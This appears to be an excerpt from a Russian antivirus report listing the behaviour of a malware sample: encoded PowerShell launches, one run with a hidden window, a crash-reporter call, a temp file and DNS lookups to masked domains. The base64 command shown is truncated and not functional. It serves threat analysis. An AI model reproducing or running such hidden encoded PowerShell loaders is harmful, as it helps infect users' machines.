Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAG8AQQBDAEQAWgBBACAAPQAgACcAMgAyADMAJwA7ACQAWQB4AEQARABBAEMAQQBBAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnADEAQQBCAGMAJwAsACcAUgBRACcAKQA7ACQAdABVADQARwBRAEEAUQA9ACQAZQBuAHYAOgB1AHMAZQByAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1552
- %TEMP%\798584.cvr
- DNS ASK av###ant.com
- DNS ASK cp#.###nking-base.com
- DNS ASK gr###aksara.com
- DNS ASK ha####there.life
- DNS ASK co##do.casa
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAG8AQQBDAEQAWgBBACAAPQAgACcAMgAyADMAJwA7ACQAWQB4AEQARABBAEMAQQBBAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnADEAQQBCAGMAJwAsACcAUgBRACcAKQA7ACQAdABVADQARwBRAEEAUQA9ACQAZQBuAHYAOgB1AHMAZQByAH...' (со скрытым окном)